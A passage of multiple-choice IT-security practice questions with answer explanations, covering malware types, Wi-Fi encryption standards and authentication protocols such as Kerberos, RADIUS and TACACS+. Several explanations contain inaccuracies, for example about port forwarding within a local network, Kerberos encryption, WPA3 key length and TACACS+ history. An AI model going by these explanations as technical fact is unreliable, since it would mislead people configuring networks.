A keylogger is malicious software or hardware that records every keystroke a user makes, often without their knowledge. If a text file contains everything the user has typed—especially sensitive information like credentials—that strongly indicates the presence of a keylogger. Keyloggers are commonly used by attackers to: Steal login credentials Monitor user activity Collect personal or financial data Why the other options are incorrect: Email application in debug mode: May log certain actions, but not all keystrokes or credentials across applications. System auditing enabled: Typically logs events like logins or file accesses—not raw keystrokes. Backup file: Would contain specific saved data, not an ongoing log of keystrokes.
What kind of security risk grants an attacker administrative-level access so they can carry out another attack while hiding their existence from system management tools?
Ransomware
Whailing
Rootkit
Virus
A rootkit is a type of malicious software designed to gain and maintain privileged (administrative-level) access to a computer while hiding its presence from system monitoring tools. Rootkits can: Modify core system files and processes Hide other malware (like keyloggers or ransomware) Allow attackers to remotely control the system undetected Rootkits are especially dangerous because they operate at a low level, often within the operating system kernel, making them hard to detect and remove. Why the others are incorrect: Ransomware: Encrypts files and demands payment but doesn’t necessarily hide itself or maintain admin access silently. Whaling: A type of phishing targeting high-level executives; it’s a social engineering attack, not malware. Virus: Spreads by infecting files or programs, but doesn’t inherently hide its presence or provide stealthy admin access.
While accessing the Wi-Fi at your favorite coffee shop, all of a sudden you realize that your mouse is moving even though you are not moving it. You were aware that accessing this public Wi-Fi was a bad idea, and now that you’ve been hacked. You want to stop the attacker as quickly as you can, but you need some time to save your files. What should you do?
Close the lid on the laptop.
Turn on Airplane mode.
Unhook the network cable.
Turn the laptop’s power off.
Turning on Airplane mode immediately disables all wireless communications, including Wi-Fi, Bluetooth, and cellular, without shutting down your computer. This helps in disconnecting the attacker while allowing you to still access your system to save your files or perform local tasks. Here’s why the other options are less effective: Close the lid on the laptop: This typically puts the laptop into sleep mode, which doesn’t cut off the connection immediately and may interrupt your chance to save files properly. Unhook the network cable: This only works if you’re connected via Ethernet. Since this is a Wi-Fi network, unhooking a cable likely has no effect. Turn the laptop’s power off: This would disconnect the attacker but also prevents you from saving your files, potentially causing data loss. Airplane mode is the fastest and safest way to cut off external access while keeping your session alive long enough to respond properly.
You just installed a security camera that is connected to your SOHO router and communicates on port 4150. You can’t see the video stream from your computer or another computer after setting up the camera. What did you forget to do?
Disable the firewall.
Close port 4150.
Configure port forwarding on the router.
Connect the camera to the router.
Port forwarding is necessary when you have a device on your local network (like the security camera) that needs to be accessed from outside the network or from another device on the network. If your camera communicates on port 4150, you’ll need to configure the router to forward incoming traffic on that port to the camera’s local IP address. This allows your computer or any other device to access the camera’s video stream. Without port forwarding, even if the camera is connected to the router, the router won’t know where to direct the traffic for that specific port. This results in a failure to access the camera from your computer or any other device on the network. Why the other options are incorrect: Disable the firewall: This is not the correct solution, as disabling the firewall would expose your network to security risks. You only need to configure the firewall (via port forwarding) to allow the specific traffic you want, not disable it completely. Close port 4150: Closing the port would prevent access to the camera’s video stream, which is the opposite of what you want to achieve. You need to keep port 4150 open but forward it to the camera’s IP. Connect the camera to the router: While connecting the camera to the router is essential for it to communicate with your network, the issue in this case is that the router is not forwarding the traffic for port 4150 to the camera. This is the root cause of the problem. Therefore, configuring port forwarding on the router for port 4150 to the camera’s local IP address is the solution to this issue.
What is NOT a type of malware that needs to be removed from a computer system?
Keylogger
Spyware
WinRE
Virus
In order to verify that both parties to a transaction are who they claim to be and encrypt their user information as it is transmitted from one to the other, you need to a protocol or process when configuring a remote connection. What will you use?
Kerberos
Multifactor authentication
TKIP
RADIUS
Kerberos is an authentication protocol designed to provide secure verification of both parties’ identities in a network transaction, and it also encrypts the communication between those parties. It was developed by MIT and is widely used in network environments to ensure that both the client and server can trust each other. It works by using tickets that are exchanged between the client and server for mutual authentication. Mutual Authentication: Kerberos ensures that both the client and the server are who they claim to be, which is essential for preventing man-in-the-middle attacks. Encryption: Kerberos encrypts data as it is transmitted, ensuring confidentiality and protection against eavesdropping during the transaction. Why the other options are incorrect: Multifactor authentication (MFA): MFA is a security process where multiple forms of authentication (such as a password and a biometric scan) are required to verify the identity of a user. While MFA adds extra security, it does not encrypt information during transmission or ensure both parties are who they claim to be in the same way Kerberos does. TKIP: TKIP is an encryption protocol used primarily for WPA (Wi-Fi Protected Access) and is not designed for authenticating or encrypting user information in a transaction context. RADIUS: RADIUS (Remote Authentication Dial-In User Service) is an authentication protocol for managing network access, but it does not encrypt information being transmitted in the way that Kerberos does. In conclusion, Kerberos is the correct protocol for verifying both parties’ identities and ensuring secure encryption of user information during a transaction.
What 128-bit block encryption is used in WPA2, more secure than TKIP, and uses an encryption key of 128, 192, or 256 bits?
AES
RADIUS
Kerberos
VPN
AES (Advanced Encryption Standard) is the encryption algorithm used in WPA2 (Wi-Fi Protected Access 2) to secure wireless network transmissions. It is a 128-bit block cipher that is more secure than TKIP (Temporal Key Integrity Protocol), which was used in WPA. AES is highly regarded for its strength and efficiency, making it the standard encryption method for WPA2. Key features of AES: Block Cipher: AES operates as a block cipher, meaning it encrypts data in fixed-size blocks, in this case, 128 bits at a time. Key Sizes: AES supports key sizes of 128, 192, or 256 bits, with 256-bit AES being the most secure option. Security: AES is a symmetric-key algorithm, meaning the same key is used for both encryption and decryption. It is considered highly secure and resistant to attacks like brute force or cryptanalysis. Use in WPA2: WPA2 uses AES for encryption of the data transmitted over the wireless network, providing significantly stronger protection than the older TKIP used in WPA. Why the other options are incorrect: RADIUS: RADIUS (Remote Authentication Dial-In User Service) is an authentication protocol, not an encryption method. It is often used for authenticating users on wireless networks but does not provide encryption for the data transmitted over the network. Kerberos: Kerberos is an authentication protocol used to verify the identity of users and computers on a network, but it does not directly relate to the encryption of wireless traffic. VPN (Virtual Private Network): A VPN encrypts traffic over a network, but it is not specific to wireless encryption like AES. It is a broader security measure that creates a secure tunnel for data to travel through, typically over the internet. Thus, AES is the correct answer because it is the 128-bit block encryption algorithm used in WPA2, offering stronger security than TKIP and supporting key sizes of 128, 192, or 256 bits.
You are setting up a wireless network for a small office. What should you enable to ensure that network transmissions are encrypted as best as possible?
WPS
WPA3
WPA
WEP
WPA3 (Wi-Fi Protected Access 3) is the most secure wireless encryption protocol available for modern wireless networks. It provides the highest level of encryption and security for network transmissions, significantly improving upon previous standards like WPA2 and WEP. Key Features of WPA3: Stronger Encryption: WPA3 uses AES (Advanced Encryption Standard) with a 256-bit key for encryption, which is much more secure than the encryption methods used in WPA2 and WEP. Forward Secrecy: WPA3 provides forward secrecy, meaning that even if an encryption key is compromised in the future, past communications remain secure. Protection Against Brute-Force Attacks: WPA3 incorporates simultaneous authentication of equals (SAE), which is more resistant to brute-force attacks compared to WPA2’s PSK (Pre-Shared Key) method. Enhanced Open Security: WPA3 also offers Opportunistic Wireless Encryption (OWE), providing encryption for open networks (without passwords) to protect users from eavesdropping. Why the other options are incorrect: WPS (Wi-Fi Protected Setup): WPS is a feature designed to simplify the connection process between devices and a router, but it does not provide encryption. In fact, it has been found to have several security vulnerabilities and is generally recommended to be disabled. WPA: WPA (Wi-Fi Protected Access) was an improvement over WEP, but it uses TKIP (Temporal Key Integrity Protocol), which is considered less secure than the encryption methods used in WPA2 or WPA3. WEP (Wired Equivalent Privacy): WEP is an outdated and highly insecure encryption protocol. It is easily cracked with modern tools and should never be used for securing a wireless network. Therefore, WPA3 is the correct choice because it provides the strongest encryption and security available for modern wireless networks, ensuring your small office’s network transmissions are as secure as possible.
Which protocol was created to authenticate remote users to a dial-in access server?
TKIP
VPN
TACACS+
RADIUS
RADIUS (Remote Authentication Dial-In User Service) was specifically created to authenticate remote users who are connecting to a dial-in access server or any network device remotely. It is a protocol that provides centralized authentication, authorization, and accounting (AAA) for users accessing a network. Key points about RADIUS: Authentication: RADIUS verifies the identity of users trying to access the network via dial-up or VPN connections. Authorization: RADIUS determines what resources the authenticated user can access. Accounting: RADIUS keeps track of user activity for billing or auditing purposes. Remote access: RADIUS was initially designed to support remote dial-in users but has since expanded to support Wi-Fi, VPNs, and other remote access technologies. Why the other options are incorrect: TKIP: Temporal Key Integrity Protocol is an encryption method used in wireless networks (specifically WPA) to secure data transmissions, but it does not relate to remote user authentication. VPN (Virtual Private Network): A VPN is a secure tunnel used to connect remote users to a network, but it does not authenticate users by itself. It can use RADIUS or other authentication protocols for user verification. TACACS+: TACACS+ is another authentication protocol developed by Cisco. It is used for managing network device access, especially for administrators, rather than for authenticating remote users to dial-in access servers. Therefore, RADIUS is the correct answer because it was specifically developed to authenticate and manage remote users connecting to dial-in access servers.
Which wireless protocol does WPA utilize to make up for WEP’s weak encryption?
AES
VLAN
VPN
TKIP
TKIP (Temporal Key Integrity Protocol) was introduced as part of WPA (Wi-Fi Protected Access) to address the weaknesses of WEP (Wired Equivalent Privacy), which was easily vulnerable to attacks due to its static encryption keys. Key points about TKIP: TKIP provides dynamic encryption keys that change frequently to make it more secure than WEP. It uses a per-packet key system, which significantly reduces the risk of key reuse and improves the overall security of wireless communications. TKIP was designed to be backward compatible with existing hardware that supported WEP, allowing for a smooth transition to WPA without requiring new hardware. While AES (Advanced Encryption Standard) is more secure and was adopted in WPA2 for stronger encryption, TKIP was the immediate solution in WPA to improve security over WEP without requiring new hardware. Why the other options are incorrect: AES: AES is used in WPA2 for stronger encryption, but it was not used in WPA for the purpose of replacing WEP’s weak encryption. VLAN (Virtual Local Area Network): VLAN is a network segmentation technology and is unrelated to wireless encryption. VPN (Virtual Private Network): VPN provides secure communication over networks, but it is not related to wireless encryption protocols like WPA. Therefore, TKIP is the correct answer because it was the protocol used in WPA to replace the weak encryption provided by WEP.
What is the oldest authentication encryption protocol that Cisco developed but became an open protocol in the 1990s and is available on Linux distributions?
AES
RADIUS
Kerberos
TACACS+
TACACS+ (Terminal Access Controller Access-Control System Plus) is the oldest authentication encryption protocol developed by Cisco. Although TACACS itself (the original version) was proprietary, TACACS+ became more widely recognized in the 1990s as Cisco’s open protocol for authentication, authorization, and accounting (AAA) of network devices. Key details: TACACS+ was developed by Cisco to provide secure communication between network devices (like routers, switches, and firewalls) and centralized authentication servers. In the 1990s, TACACS+ became an open standard, which led to its wider adoption by multiple network vendors, including availability on Linux distributions. TACACS+ encrypts the entire communication between the device and the authentication server, making it more secure than earlier protocols like RADIUS. Why the other options are incorrect: AES: AES (Advanced Encryption Standard) is an encryption algorithm, not an authentication protocol, and it does not fit the description provided in the question. RADIUS: Although RADIUS is widely used and became an open protocol in the 1990s, TACACS+ is the correct answer because it is specifically Cisco-developed, whereas RADIUS was developed by Livingston Enterprises. Kerberos: While Kerberos is an important authentication protocol, it was not developed by Cisco and does not meet the criteria described in the question. Therefore, TACACS+ is the correct answer because it was developed by Cisco, became an open protocol in the 1990s, and is available on Linux distributions for secure authentication and management of network devices.
Which wireless encryption protocol employs TKIP and AES for backward compatibility and replaced WPA?
RADIUS
WEP
WPA2
WPA3
WPA2 (Wi-Fi Protected Access 2) is the encryption protocol that replaced WPA (Wi-Fi Protected Access) and employs TKIP (Temporal Key Integrity Protocol) and AES (Advanced Encryption Standard) for backward compatibility. Here’s how WPA2 works: WPA2 uses AES as the primary encryption method, which is more secure than the older encryption methods. To ensure backward compatibility with older devices that may not support AES, WPA2 also allows the use of TKIP, which was used in WPA (the predecessor to WPA2). Why the other options are incorrect: RADIUS: This is an authentication protocol, not an encryption protocol. It is often used for authenticating users in wireless networks but does not replace WPA or use TKIP/AES. WEP (Wired Equivalent Privacy): This is an older and insecure encryption protocol, which was used before WPA and WPA2. WEP has been deprecated due to its numerous security vulnerabilities. WPA3: This is the latest encryption standard, offering improved security over WPA2. However, WPA3 does not use TKIP and AES for backward compatibility; it only uses AES and does not support older devices as WPA2 does. Therefore, WPA2 is the correct answer because it replaces WPA and uses both TKIP and AES to provide compatibility with older and newer devices.
A failed SOHO router has been replaced by a new one. The devices on your network are a mix of old ones from few years ago and newer ones from 2022. Which encryption method should you use to configure this new SOHO router?
WPA2
WPA3
WPA2/WPA3
WEP
When setting up a new SOHO (Small Office/Home Office) router, you should configure it to support WPA2/WPA3 encryption. This option allows the router to be compatible with both older devices (which may only support WPA2) and newer devices (which should support WPA3). Here’s why: WPA2 is widely supported by older devices, so it ensures that legacy devices (from a few years ago) can still connect securely. WPA3 is the latest Wi-Fi security standard and offers stronger encryption and improved protection against brute-force attacks, making it ideal for newer devices (like those from 2022). WPA2/WPA3 mixed mode allows the router to work in both WPA2 and WPA3 modes simultaneously, ensuring compatibility across a range of devices on your network. Why the other options are incorrect: WPA2: While it is still secure and widely supported, it lacks the improved security features of WPA3. WPA3: While it offers stronger security, it may not be supported by older devices, making it impractical for a mixed-device network. WEP: This is an outdated and insecure encryption method that should never be used, as it is easily compromised. Therefore, WPA2/WPA3 is the best choice to ensure security and compatibility for both older and newer devices on your network.